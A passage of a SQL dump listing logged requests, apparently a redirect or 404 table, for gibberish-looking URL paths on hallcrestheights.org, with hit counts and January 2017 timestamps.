00:00:00'),(5083,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-fvbbg/zagp-eciyyuw-uvfztji-gjina-mzbcng-i20162629-k5199-tfml/',NULL,'','',1,0,'2017-01-14 10:52:25','0000-00-00 00:00:00'),(5084,'http://www.hallcrestheights.org/nfrkop-dobbumgo-lzes-i20162633-rkwtz/qtqb-svjcwjb-xnmyvss-sldjz-naahjb-k17439-kwxr/',NULL,'','',1,0,'2017-01-14 10:55:39','0000-00-00 00:00:00'),(5085,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-i20162632-kvum-zbsai/imjz-fozgdvd-dqjvdob-knlyk-conedw-k60639-jmax/',NULL,'','',1,0,'2017-01-14 10:58:51','0000-00-00 00:00:00'),(5086,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-i20162633-vtzpx/bxkc-wjybtyl-wosduie-qgwso-gxhgpi-k18339-sdht/',NULL,'','',1,0,'2017-01-14 11:02:05','0000-00-00 00:00:00'),(5087,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-i20162633-fvbbg/zagp-eciyyuw-uvfztji-gjina-mzbcng-k19239-tfml/',NULL,'','',1,0,'2017-01-14 11:05:18','0000-00-00 00:00:00'),(5088,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj/njbo-gtsakbc-cgyfmdv-juxzl-ektsls-i20162629-k24999-hxos/',NULL,'','',1,0,'2017-01-14 11:08:31','0000-00-00 00:00:00'),(5089,'http://www.hallcrestheights.org/xhajv-k33607-qlwczb-iqsos-qxoq/kgqaqyd-cptznzvt-i20162634-jqoevpca-qwjaluw-tybckbsx/',NULL,'','',1,0,'2017-01-14 11:11:44','0000-00-00 00:00:00'),(5090,'http://www.hallcrestheights.org/i20162630-cwhriwg-pekzq-dwkvum-k55023-zbsaii/mjzfo-zgdv-ddqjvd-obknly-kconedw-jmaxe/',NULL,'','',1,0,'2017-01-14 11:14:57','0000-00-00 00:00:00'),(5091,'http://www.hallcrestheights.org/i20162630-ajqxxuc-uzaof-ifephi-k56823-ijimjn/jbogt-sakb-ccgyfm-dvjuxz-lektsls-hxosq/',NULL,'','',1,0,'2017-01-14 11:18:09','0000-00-00 00:00:00'),(5092,'http://www.hallcrestheights.org/nfrko-k54307-pdobbu-mgolz-esrk/wtzqtqb-svjcwjbx-i20162634-nmyvsssl-djznaah-jbkwxros/',NULL,'','',1,0,'2017-01-14 11:21:23','0000-00-00 00:00:00'),(5093,'http://www.hallcrestheights.org/tkuykfjd-k7791-njjb-ucyupaj-i20162633-aylrlwfv/dyruqpkl-sdef-hxdf-pdfuf-pfaj-npvzatt/',NULL,'','',1,0,'2017-01-14 11:24:36','0000-00-00 00:00:00'),(5094,'http://www.hallcrestheights.org/cwhriwgp-k34431-ekzq-dwkvumz-bsaiimjz/i20162634-fozgdvdd-qjvd-obkn-lykco-nedw-jmaxevo/',NULL,'','',1,0,'2017-01-14 11:27:48','0000-00-00 00:00:00'),(5095,'http://www.hallcrestheights.org/yembjvht-k35331-qqdc-kzfltzt-erqbwnsw/i20162634-nsnjplpf-trrj-ncyp-joqwg-zjev-ihsdpac/',NULL,'','',1,0,'2017-01-14 11:31:02','0000-00-00 00:00:00'),(5096,'http://www.hallcrestheights.org/i20162630-bsoapaza-k48651-psta-sgmhcqc-mckfrdtf/kgpvbchs-iwho-rklv-zrtjr-syoa-ayfwgdx/',NULL,'','',1,0,'2017-01-14 11:34:15','0000-00-00 00:00:00'),(5097,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-uhvfcy/zlsxx-i20162631-k7023-qrox-aehksk-xyxemb-uqudtwq-ceyvu-ciwqw/',NULL,'','',1,0,'2017-01-14 11:37:28','0000-00-00 00:00:00'),(5098,'http://www.hallcrestheights.org/nfrko-pdobbu-mgolz-esrk/i20162634-wtzqtqb-svjcwjbx-nmyvsssl-k53007-djznaah-jbkwxros-holvg/',NULL,'','',1,0,'2017-01-14 11:43:53','0000-00-00 00:00:00'),(5099,'http://www.hallcrestheights.org/nfrkopd-obbum-golzes-rkwtzq/i20162630-tqbsv-jcwj-bxnmyv-sssldj-znaahjb-k54723-kwxro-sholv/',NULL,'','',1,0,'2017-01-14 11:47:08','0000-00-00 00:00:00'),(5100,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-kbqx/dosfiet-i20162635-yuaixnrb-dggsaarh-k11607-efskjyd-mrujwimj-qiaau/',NULL,'','',1,0,'2017-01-14 11:50:20','0000-00-00 00:00:00'),(5101,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-i20162629-dgfnh/skrl-jrgfctf-k3999-zfiwxwm-akoay-osmpql-gveg-dfvgcrcb/',NULL,'','',1,0,'2017-01-14 11:53:33','0000-00-00 00:00:00'),(5102,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-oqkgq/aqyd-cptznzv-i20162632-k39639-tjqoevp-caqwj-aluwty-bckb-sxbnbgnn/',NULL,'','',1,0,'2017-01-14 11:56:45','0000-00-00 00:00:00'),(5103,'http://www.hallcrestheights.org/oiyizg-olrcmwfb-snop-dgfnh/skrl-jrgfctf-zfiwxwm-i20162633-akoay-osmpql-gveg-k18039-dfvgcrcb/',NULL,'','',1,0,'2017-01-14 11:59:58','0000-00-00 00:00:00'),(5104,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-fvbbg/zagp-eciyyuw-i20162632-uvfztji-gjina-k38739-mzbcng-tfml-yrghdfip/',NULL,'','',1,0,'2017-01-14 12:03:12','0000-00-00 00:00:00'),(5105,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-i20162628-ikvf-vtzpx/bxkc-wjybtyl-wosduie-qgwso-gxhgpi-k47199-sdht-nirmjhvz/',NULL,'','',1,0,'2017-01-14 12:06:25','0000-00-00 00:00:00'),(5106,'http://www.hallcrestheights.org/k7491-soegszxy-ifet-vtndyuu-hvfcyzls/xxqroxae-hksk-xyxe-i20162633-mbuqu-dtwq-ceyvuci-wqwsgf/',NULL,'','',1,0,'2017-01-14 12:09:38','0000-00-00 00:00:00'),(5107,'http://www.hallcrestheights.org/k26499-bsoapa-zapstasg-mhcq-i20162629-cmckf/rdtf-kgpvbch-siwhork-lvzrt-jrsyoa-ayfw-gdxskmyu/',NULL,'','',1,0,'2017-01-14 12:16:04','0000-00-00 00:00:00'),(5108,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-uhvfc/yzls-xxqroxa-i20162632-k59439-ehkskxy-xembu-qudtwq-ceyv-uciwqwsg/',NULL,'','',1,0,'2017-01-14 12:19:17','0000-00-00 00:00:00'),(5109,'http://www.hallcrestheights.org/kzpffm-sxklrded-i20162628-hwge-fvbbg/zagp-eciyyuw-uvfztji-k48099-gjina-mzbcng-tfml-yrghdfip/',NULL,'','',1,0,'2017-01-14 12:22:30','0000-00-00 00:00:00'),(5110,'http://www.hallcrestheights.org/yembjvht-qqdc-kzfltzt-erqbwnsw/nsnjplpf-i20162631-trrj-ncyp-joqwg-zjev-k61851-ihsdpac-aylhya/',NULL,'','',1,0,'2017-01-14 12:25:43','0000-00-00 00:00:00'),(5111,'http://www.hallcrestheights.org/ajqxxucu-zaof-ifephii-jimjnjbo/gtsakbcc-k55731-gyfm-dvju-xzlek-i20162634-tsls-hxosqqj-vfyoih/',NULL,'','',1,0,'2017-01-14 12:28:56','0000-00-00 00:00:00'),(5112,'http://www.hallcrestheights.org/oiyiz-golrcm-wfbsn-opdg/k53607-fnhskrl-jrgfctfz-fiwxwmak-oayosmp-i20162634-qlgvegdf-vgcrc-bzmq/',NULL,'','',1,0,'2017-01-14 12:32:09','0000-00-00 00:00:00'),(5113,'http://www.hallcrestheights.org/edzvdlqc-i20162635-omnnm-k26600-mcawvbfu-japyvrl-flxh-qjkuh.htm',NULL,'http://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0ahUKEwiGrNac0sHRAhVHe7wKHU8nBmwQFghuMA4&url=http%3A%2F%2Fwww.hallcrestheights.o','',45,0,'2017-01-14 12:33:43','0000-00-00 00:00:00'),(5114,'http://www.hallcrestheights.org/qlbow-ciggec-eayaf-xrgl/nikghhm-bbxpgesm-rcaiztbi-auwdtvi-i20162634-k32007-xpmtzhzz-wzrqr-dcfp/',NULL,'','',1,0,'2017-01-14 12:35:21','0000-00-00 00:00:00'),(5115,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-umzb/k33807-saiimjz-fozgdvdd-qjvdobkn-lykcone-i20162634-dwjmaxev-ortbz-qsax/',NULL,'','',1,0,'2017-01-14 12:38:35','0000-00-00 00:00:00'),(5116,'http://www.hallcrestheights.org/cwhriwgp-ekzq-dwkvumz-bsaiimjz/fozgdvdd-i20162633-qjvd-obkn-lykco-nedw-jmaxevo-rtbzqs-k7391-axidi/',NULL,'','',1,0,'2017-01-14 12:41:48','0000-00-00 00:00:00'),(5117,'http://www.hallcrestheights.org/yembjvht-qqdc-kzfltzt-erqbwnsw/nsnjplpf-i20162633-trrj-ncyp-joqwg-zjev-ihsdpac-aylhya-k8291-yzeue/',NULL,'','',1,0,'2017-01-14 12:45:00','0000-00-00 00:00:00'),(5118,'http://www.hallcrestheights.org/qlbowcig-gece-ayafxrg-i20162631-lnikghhm/bbxpgesm-rcai-ztbi-auwdt-vixp-mtzhzzw-zrqrdc-k61751-fpsmf/',NULL,'','',1,0,'2017-01-14 12:48:13','0000-00-00 00:00:00'),(5119,'http://www.hallcrestheights.org/nfrkopd-obbum-i20162630-golzes-rkwtzq/tqbsv-jcwj-bxnmyv-sssldj-znaahjb-kwxro-sholv-k33923-gwxkwoih/',NULL,'','',1,0,'2017-01-14 12:51:27','0000-00-00 00:00:00'),(5120,'http://www.hallcrestheights.org/tkuykfjd-njjb-ucyupaj-i20162631-aylrlwfv/dyruqpkl-sdef-hxdf-pdfuf-pfaj-npvzatt-uxdwvp-k62651-eekly/',NULL,'','',1,0,'2017-01-14 12:54:40','0000-00-00 00:00:00'),(5121,'http://www.hallcrestheights.org/qlbowcig-gece-ayafxrg-lnikghhm/bbxpgesm-i20162633-rcai-ztbi-auwdt-vixp-mtzhzzw-zrqrdc-k28991-fpsmf/',NULL,'','',1,0,'2017-01-14 12:57:53','0000-00-00 00:00:00'),(5122,'http://www.hallcrestheights.org/tkuykfjd-njjb-ucyupaj-aylrlwfv/dyruqpkl-sdef-i20162634-hxdf-pdfuf-pfaj-npvzatt-uxdwvp-k55631-eekly/',NULL,'','',1,0,'2017-01-14 13:01:06','0000-00-00 00:00:00'),(5123,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-fvbbg/zagp-eciyyuw-uvfztji-i20162635-gjina-mzbcng-tfml-yrghdfip-k38999-wgdqrkbh/',NULL,'','',1,0,'2017-01-14 13:04:19','0000-00-00 00:00:00'),(5124,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-uhvfc/i20162632-yzls-xxqroxa-ehkskxy-xembu-qudtwq-ceyv-uciwqwsg-k38639-frvrjods/',NULL,'','',1,0,'2017-01-14 13:07:31','0000-00-00 00:00:00'),(5125,'http://www.hallcrestheights.org/wbwpbo-i20162629-nkydhxjj-ikvf-vtzpx/bxkc-wjybtyl-wosduie-qgwso-gxhgpi-sdht-nirmjhvz-k26399-yxodbxan/',NULL,'','',1,0,'2017-01-14 13:10:45','0000-00-00 00:00:00'),(5126,'http://www.hallcrestheights.org/xhajvq-lwczbiqs-osqx-oqkgq/aqyd-i20162633-cptznzv-tjqoevp-caqwj-aluwty-bckb-sxbnbgnn-k18839-dorcajpp/',NULL,'','',1,0,'2017-01-14 13:13:58','0000-00-00 00:00:00'),(5127,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai/i20162632-imjz-fozgdvd-dqjvdob-knlyk-conedw-jmax-evortbzq-k59339-saxidihg/',NULL,'','',1,0,'2017-01-14 13:17:11','0000-00-00 00:00:00'),(5128,'http://www.hallcrestheights.org/xhajv-qlwczb-iqsos-qxoq/kgqaqyd-cptznzvt-i20162634-jqoevpca-qwjaluw-tybckbsx-bnbgn-ndor-k54407-cajppe/',NULL,'','',1,0,'2017-01-14 13:20:23','0000-00-00 00:00:00'),(5129,'http://www.hallcrestheights.org/zmku-edtzjiv/i20162634-k62-yoqxi-fgxuhx.htm',NULL,'','',1,0,'2017-01-14 13:23:37','0000-00-00 00:00:00'),(5130,'http://www.hallcrestheights.org/i20162636-vqjny-spvh/k53054-oljp-eurrtpil.htm',NULL,'','',1,0,'2017-01-14 13:26:49','0000-00-00 00:00:00'),(5131,'http://www.hallcrestheights.org/i20162632-edzvd-lqco/k58814-mnnm-mcawvbfu.htm',NULL,'','',1,0,'2017-01-14 13:30:03','0000-00-00 00:00:00'),(5132,'http://www.hallcrestheights.org/i20162636-edzvd-lqco/k42434-mnnm-mcawvbfu.htm',NULL,'','',1,0,'2017-01-14 13:33:15','0000-00-00 00:00:00'),(5133,'http://www.hallcrestheights.org/ixnmu-i20162637-eahw/k21734-hioz-hjxbnwpg.htm',NULL,'','',1,0,'2017-01-14 13:39:42','0000-00-00 00:00:00'),(5134,'http://www.hallcrestheights.org/i20162628-mrcqgb-eifuwg/k1826-rabtnw-yrqs.htm',NULL,'','',1,0,'2017-01-14 13:42:54','0000-00-00 00:00:00'),(5135,'http://www.hallcrestheights.org/i20162636-zmkue-dtzj/k32354-ivyo-qxifgxuh.htm',NULL,'','',1,0,'2017-01-14 13:49:21','0000-00-00 00:00:00'),(5136,'http://www.hallcrestheights.org/i20162636-mrcqg-beif/k11654-uwgr-abtnwyrq.htm',NULL,'','',1,0,'2017-01-14 13:52:34','0000-00-00 00:00:00'),(5137,'http://www.hallcrestheights.org/upttm-i20162633-nbea/k16514-tgrb-nqcdcncx.htm',NULL,'','',1,0,'2017-01-14 13:55:47','0000-00-00 00:00:00'),(5138,'http://www.hallcrestheights.org/ryvhrh-mqtyys/i20162634-k61766-llgeaj-anpd.htm',NULL,'','',1,0,'2017-01-14 13:58:59','0000-00-00 00:00:00'),(5139,'http://www.hallcrestheights.org/i20162628-vqjn-yspvhol/k37142-jpeur-rtpilu.htm',NULL,'','',1,0,'2017-01-14 14:02:13','0000-00-00 00:00:00'),(5140,'http://www.hallcrestheights.org/gnfz-nxvjxpa/i20162634-k41462-ltitj-shkyjy.htm',NULL,'','',1,0,'2017-01-14 14:05:26','0000-00-00 00:00:00'),(5141,'http://www.hallcrestheights.org/i20162628-zmku-edtzjiv/k16442-yoqxi-fgxuhx.htm',NULL,'','',1,0,'2017-01-14 14:08:38','0000-00-00 00:00:00'),(5142,'http://www.hallcrestheights.org/jgletk-ymdrqz/i20162634-k41066-nrvmlk-swaz.htm',NULL,'','',1,0,'2017-01-14 14:11:52','0000-00-00 00:00:00'),(5143,'http://www.hallcrestheights.org/i20162636-jgletkym-drqzn/k5030-rvmlkswa-zvkecqq.htm',NULL,'','',1,0,'2017-01-14 14:15:05','0000-00-00 00:00:00'),(5144,'http://www.hallcrestheights.org/i20162636-ryvhrhmq-tyysl/k25730-lgeajanp-dmefnxh.htm',NULL,'','',1,0,'2017-01-14 14:21:31','0000-00-00 00:00:00'),(5145,'http://www.hallcrestheights.org/zmkuedtz-jivyo/k49670-qxifgxuh-i20162631-xptvuhm.htm',NULL,'','',1,0,'2017-01-14 14:24:44','0000-00-00 00:00:00'),(5146,'http://www.hallcrestheights.org/i20162636-lugdltrs-mxxhy/k46430-pzqjllzo-hnjumnt.htm',NULL,'','',2,0,'2017-01-14 14:27:57','0000-00-00 00:00:00'),(5147,'http://www.hallcrestheights.org/i20162632-zmkuedtz-jivyo/k14570-qxifgxuh-xptvuhm.htm',NULL,'','',1,0,'2017-01-14 14:31:10','0000-00-00 00:00:00'),(5148,'http://www.hallcrestheights.org/i20162632-pcscqruf-unpkw/k56870-xpoideot-wtvsoar.htm',NULL,'','',1,0,'2017-01-14 14:34:23','0000-00-00 00:00:00'),(5149,'http://www.hallcrestheights.org/i20162632-ryvhrhmq-tyysl/k16370-lgeajanp-dmefnxh.htm',NULL,'','',1,0,'2017-01-14 14:40:48','0000-00-00 00:00:00'),(5150,'http://www.hallcrestheights.org/i20162628-ixnmueah-whioz/k17990-hjxbnwpg-eyooayi.htm',NULL,'','',1,0,'2017-01-14 14:44:01','0000-00-00 00:00:00'),(5151,'http://www.hallcrestheights.org/zmkued-k1726-tzjivy/oqxifg-i20162628-xuhx-ptvuhm.htm',NULL,'','',1,0,'2017-01-14 14:50:28','0000-00-00 00:00:00'),(5152,'http://www.hallcrestheights.org/ryvhrh-k40966-mqtyys/llgeaj-anpd-i20162634-mefnxh.htm',NULL,'','',1,0,'2017-01-14 14:53:41','0000-00-00 00:00:00'),(5153,'http://www.hallcrestheights.org/i20162635-jgletk-k20266-ymdrqz/nrvmlk-swaz-vkecqq.htm',NULL,'','',1,0,'2017-01-14 14:56:54','0000-00-00 00:00:00'),(5154,'http://www.hallcrestheights.org/lugdlt-k61666-rsmxxh/ypzqjl-lzoh-i20162634-njumnt.htm',NULL,'','',1,0,'2017-01-14 15:00:07','0000-00-00 00:00:00'),(5155,'http://www.hallcrestheights.org/pcscqr-k44026-ufunpk/i20162637-wxpoid-eotw-tvsoar.htm',NULL,'','',1,0,'2017-01-14 15:03:20','0000-00-00 00:00:00'),(5156,'http://www.hallcrestheights.org/dvisc-iwbv/i20162632-wkux-krbzomsm-k59614-vuclzuph.htm',NULL,'','',1,0,'2017-01-14 15:06:32','0000-00-00 00:00:00'),(5157,'http://www.hallcrestheights.org/vqjn-yspvhol/k16342-jpeur-i20162628-rtpilu-ourxivl.htm',NULL,'','',1,0,'2017-01-14 15:09:47','0000-00-00 00:00:00'),(5158,'http://www.hallcrestheights.org/i20162630-vqjn-yspvhol/k53782-jpeur-rtpilu-ourxivl.htm',NULL,'','',1,0,'2017-01-14 15:12:59','0000-00-00 00:00:00'),(5159,'http://www.hallcrestheights.org/zmkue-i20162636-dtzj/ivyo-qxifgxuh-k11554-xptvuhmi.htm',NULL,'','',1,0,'2017-01-14 15:16:12','0000-00-00 00:00:00'),(5160,'http://www.hallcrestheights.org/gnfz-nxvjxpa/k37042-ltitj-i20162628-shkyjy-ldpijaa.htm',NULL,'','',1,0,'2017-01-14 15:22:38','0000-00-00 00:00:00'),(5161,'http://www.hallcrestheights.org/edzvd-lqco/i20162632-mnnm-mcawvbfu-k21634-japyvrlf.htm',NULL,'','',1,0,'2017-01-14 15:25:51','0000-00-00 00:00:00'),(5162,'http://www.hallcrestheights.org/jgle-tkymdrq/k42262-znrvm-lkswaz-i20162634-vkecqqn.htm',NULL,'','',1,0,'2017-01-14 15:29:04','0000-00-00 00:00:00'),(5163,'http://www.hallcrestheights.org/jgle-tkymdrq/k58642-znrvm-i20162628-lkswaz-vkecqqn.htm',NULL,'','',1,0,'2017-01-14 15:32:17','0000-00-00 00:00:00'),(5164,'http://www.hallcrestheights.org/gnfzn-i20162636-xvjx/palt-itjshkyj-k52954-yldpijaa.htm',NULL,'','',1,0,'2017-01-14 15:35:30','0000-00-00 00:00:00'),(5165,'http://www.hallcrestheights.org/dvis-ciwbvwk/k57742-uxkrb-i20162628-zomsmv-uclzuph.htm',NULL,'','',1,0,'2017-01-14 15:38:42','0000-00-00 00:00:00'),(5166,'http://www.hallcrestheights.org/k36970-ixnmueah-whioz/i20162632-hjxbnwpg-eyooayi-kuks.htm',NULL,'','',1,0,'2017-01-14 15:41:56','0000-00-00 00:00:00'),(5167,'http://www.hallcrestheights.org/k16270-lugdltrs-mxxhy/i20162632-pzqjllzo-hnjumnt-ecwf.htm',NULL,'','',1,0,'2017-01-14 15:45:08','0000-00-00 00:00:00'),(5168,'http://www.hallcrestheights.org/k49570-vqjnyspv-i20162631-holjp/eurrtpil-uourxiv-lbtr.htm',NULL,'','',1,0,'2017-01-14 15:48:22','0000-00-00 00:00:00'),(5169,'http://www.hallcrestheights.org/k47050-ryvhrhmq-tyysl/lgeajanp-dmefnxh-i20162634-qfhj.htm',NULL,'','',1,0,'2017-01-14 15:51:34','0000-00-00 00:00:00'),(5170,'http://www.hallcrestheights.org/k35170-gnfznxvj-xpalt/i20162632-itjshkyj-yldpija-amdu.htm',NULL,'','',1,0,'2017-01-14 15:54:48','0000-00-00 00:00:00'),(5171,'http://www.hallcrestheights.org/mrcqg-beif/k734-uwgr-i20162637-abtnwyrq-semgwkow-hmemxg.htm',NULL,'','',1,0,'2017-01-14 16:01:14','0000-00-00 00:00:00'),(5172,'http://www.hallcrestheights.org/i20162628-gnfznx-vjxpal/k1526-titjsh-kyjy-ldpija-amdurt.htm',NULL,'','',1,0,'2017-01-14 16:04:27','0000-00-00 00:00:00'),(5173,'http://www.hallcrestheights.org/ryvhrh-mqtyys/k43826-llgeaj-i20162637-anpd-mefnxh-qfhjdy.htm',NULL,'','',1,0,'2017-01-14 16:07:40','0000-00-00 00:00:00'),(5174,'http://www.hallcrestheights.org/jgletk-ymdrqz/k23126-nrvmlk-i20162637-swaz-vkecqq-neeiaq.htm',NULL,'','',1,0,'2017-01-14 16:14:06','0000-00-00 00:00:00'),(5175,'http://www.hallcrestheights.org/dvisc-iwbv/k1634-wkux-i20162637-krbzomsm-vuclzuph-vqawuo.htm',NULL,'','',1,0,'2017-01-14 16:17:19','0000-00-00 00:00:00'),(5176,'http://www.hallcrestheights.org/mrcqgb-eifuwg/k44726-rabtnw-i20162637-yrqs-emgwko-whmemx.htm',NULL,'','',1,0,'2017-01-14 16:20:32','0000-00-00 00:00:00'),(5177,'http://www.hallcrestheights.org/fadla-jfnl/i20162636-k52754-gfpc-vwgmyhde-cwxbdeud-kovfii.htm',NULL,'','',1,0,'2017-01-14 16:26:58','0000-00-00 00:00:00'),(5178,'http://www.hallcrestheights.org/vqjny-spvh/k58514-oljp-eurrtpil-i20162632-uourxivl-btrhnn.htm',NULL,'','',1,0,'2017-01-14 16:30:11','0000-00-00 00:00:00'),(5179,'http://www.hallcrestheights.org/jglet-kymd/i20162636-k32954-rqzn-rvmlkswa-zvkecqqn-eeiaqj.htm',NULL,'','',1,0,'2017-01-14 16:33:24','0000-00-00 00:00:00'),(5180,'http://www.hallcrestheights.org/dvisc-iwbv/i20162636-k32054-wkux-krbzomsm-vuclzuph-vqawuo.htm',NULL,'','',1,0,'2017-01-14 16:36:37','0000-00-00 00:00:00'),(5181,'http://www.hallcrestheights.org/upttm-nbea/k59414-tgrb-nqcdcncx-i20162632-rdhcpgzz-dllimv.htm',NULL,'','',1,0,'2017-01-14 16:39:49','0000-00-00 00:00:00'),(5182,'http://www.hallcrestheights.org/gnfzn-xvjx/i20162636-k11354-palt-itjshkyj-yldpijaa-mdurta.htm',NULL,'','',1,0,'2017-01-14 16:43:03','0000-00-00 00:00:00'),(5183,'http://www.hallcrestheights.org/ixnmu-eahw/i20162636-k41234-hioz-hjxbnwpg-eyooayik-uksszq.htm',NULL,'','',1,0,'2017-01-14 16:46:15','0000-00-00 00:00:00'),(5184,'http://www.hallcrestheights.org/ryvhr-hmqt/i20162636-k53654-yysl-lgeajanp-dmefnxhq-fhjdyh.htm',NULL,'','',1,0,'2017-01-14 16:49:29','0000-00-00 00:00:00'),(5185,'http://www.hallcrestheights.org/zmkue-dtzj/k21434-ivyo-qxifgxuh-i20162632-xptvuhmi-wnzkor.htm',NULL,'','',1,0,'2017-01-14 16:52:42','0000-00-00 00:00:00'),(5186,'http://www.hallcrestheights.org/edzvd-lqco/i20162636-k61934-mnnm-mcawvbfu-japyvrlf-lxhqjk.htm',NULL,'','',1,0,'2017-01-14 16:55:54','0000-00-00 00:00:00'),(5187,'http://www.hallcrestheights.org/dvisc-iwbv/k18014-wkux-krbzomsm-vuclzuph-i20162633-vqawuo.htm',NULL,'','',1,0,'2017-01-14 16:59:08','0000-00-00 00:00:00'),(5188,'http://www.hallcrestheights.org/ixnmueah-whioz/i20162636-k4730-hjxbnwpg-eyooayi-kuks-szqce.htm',NULL,'','',1,0,'2017-01-14 17:02:21','0000-00-00 00:00:00'),(5189,'http://www.hallcrestheights.org/zmkuedtz-jivyo/k57470-qxifgxuh-xptvuhm-i20162632-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-14 17:05:34','0000-00-00 00:00:00'),(5190,'http://www.hallcrestheights.org/i20162628-lugd-ltrsmxx/k58442-hypzq-jllzoh-njumnte-cwfogywb.htm',NULL,'','',1,0,'2017-01-14 17:08:47','0000-00-00 00:00:00'),(5191,'http://www.hallcrestheights.org/i20162628-dvis-ciwbvwk/k16142-uxkrb-zomsmv-uclzuph-vqawuoxz.htm',NULL,'','',1,0,'2017-01-14 17:12:00','0000-00-00 00:00:00'),(5192,'http://www.hallcrestheights.org/upttm-nbea/k43034-tgrb-nqcdcncx-i20162632-rdhcpgzz-dllimv.htm',NULL,'','',1,0,'2017-01-14 19:33:32','0000-00-00 00:00:00'),(5193,'http://www.hallcrestheights.org/mrcqgbei-fuwgr/k36770-abtnwyrq-semgwko-i20162632-whme-mxgku.htm',NULL,'','',1,0,'2017-01-14 19:39:58','0000-00-00 00:00:00'),(5194,'http://www.hallcrestheights.org/edzvdlq-comnnmmc/k42278-awvbfuja-pyvrlfl-i20162632-xhqjku-hkcmu.htm',NULL,'','',1,0,'2017-01-14 19:43:10','0000-00-00 00:00:00'),(5195,'http://www.hallcrestheights.org/vqjny-i20162633-spvh-k26014-oljp/eurrtpil-uourxivl-btrhnn-mtqzk.htm',NULL,'','',1,0,'2017-01-14 19:46:10','0000-00-00 00:00:00'),(5196,'http://www.hallcrestheights.org/ryvhr-i20162633-hmqt-yysl/lgeajanp-dmefnxhq-fhjdyh-k1134-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-14 19:52:10','0000-00-00 00:00:00'),(5197,'http://www.hallcrestheights.org/ixnmuea-i20162633-k778-hwhiozhj-xbnwpgey/ooayiku-ksszqc-ebaqd-omytniho.htm',NULL,'','',1,0,'2017-01-14 19:55:10','0000-00-00 00:00:00'),(5198,'http://www.hallcrestheights.org/lugdl-k59014-trsm-xxhy-pzqjllzo/i20162632-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz.htm',NULL,'','',1,0,'2017-01-14 19:58:11','0000-00-00 00:00:00'),(5199,'http://www.hallcrestheights.org/zmkuedtz-k25750-jivyo-qxifgxuh-xptvuhm/iwnz-korpv-ubfgnq-i20162635-tpmh-prbikzon.htm',NULL,'','',1,0,'2017-01-14 20:01:10','0000-00-00 00:00:00'),(5200,'http://www.hallcrestheights.org/mrcqg-beif-uwgr-i20162633-abtnwyrq/k26214-semgwkow-hmemxg-kucyb-npzkic-vejxk-ulzjcjk.htm',NULL,'','',1,0,'2017-01-14 20:04:10','0000-00-00 00:00:00'),(5201,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-i20162633-mcawvbfu/k17214-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp.htm',NULL,'','',1,0,'2017-01-14 20:07:10','0000-00-00 00:00:00'),(5202,'http://www.hallcrestheights.org/zmkue-dtzj-i20162632-ivyo-qxifgxuh/k42234-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi-kzonmtl.htm',NULL,'','',1,0,'2017-01-14 20:10:10','0000-00-00 00:00:00'),(5203,'http://www.hallcrestheights.org/k35970-jgletkym-drqzn-i20162632-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-ilnvoxbd-jveebikp.htm',NULL,'','',1,0,'2017-01-14 20:13:10','0000-00-00 00:00:00'),(5204,'http://www.hallcrestheights.org/k27150-mrcqgbei-fuwgr-abtnwyrq-semgwko/whme-i20162635-mxgku-cybnpz-kicv-ejxkulzj-cjkntsxj.htm',NULL,'','',1,0,'2017-01-14 20:16:10','0000-00-00 00:00:00'),(5205,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx/k1434-rdhcpgzz-dllimv-yxjlt-i20162633-feobke-bwivs-mqkrfbm-lkmstho.htm',NULL,'','',1,0,'2017-01-14 20:19:12','0000-00-00 00:00:00'),(5206,'http://www.hallcrestheights.org/xhajvqlw-i20162633-czbi-qsosqxo/k18891-qkgqaqyd-cptznzvt-jqoe-vpca-qwjal/',NULL,'','',1,0,'2017-01-14 20:19:46','0000-00-00 00:00:00'),(5207,'http://www.hallcrestheights.org/edzvdlqc-k25950-omnnm-mcawvbfu-japyvrl/flxh-qjkuh-kcmumb-hmgz-nkoheyru-i20162635-pxpudzik-musshe.htm',NULL,'','',1,0,'2017-01-14 20:22:10','0000-00-00 00:00:00'),(5208,'http://www.hallcrestheights.org/ixnm-ueahwhi-ozhjx-bnwpge/yooayik-uksszqce-baqdomy-tniholbd-i20162634-enta-k21162-fymluzex-tlfggcsd.htm',NULL,'','',1,0,'2017-01-14 20:25:10','0000-00-00 00:00:00'),(5209,'http://www.hallcrestheights.org/bsoapaz-apsta/i20162630-sgmhcq-k45323-cmckfr/',NULL,'','',1,0,'2017-01-14 20:28:11','0000-00-00 00:00:00'),(5210,'http://www.hallcrestheights.org/zmkuedtz-jivyo-k60590-qxifgxuh-xptvuhm/iwnz-korpv-ubfgnq-tpmh-prbikzon-i20162637-mtlajhol-jrdklt-sqwxxu.htm',NULL,'','',1,0,'2017-01-14 20:31:10','0000-00-00 00:00:00'),(5211,'http://www.hallcrestheights.org/oiyizgo-lrcmw/i20162630-fbsnop-k46223-dgfnhs/',NULL,'','',1,0,'2017-01-14 20:34:10','0000-00-00 00:00:00'),(5212,'http://www.hallcrestheights.org/fadlajfn-lgfpc-k61490-vwgmyhde-cwxbdeu/dkov-fiibp-tquhzx-chhr-mxagfpap-i20162637-uhgfqvjd-clbbvz-grcmdf.htm',NULL,'','',1,0,'2017-01-14 20:37:10','0000-00-00 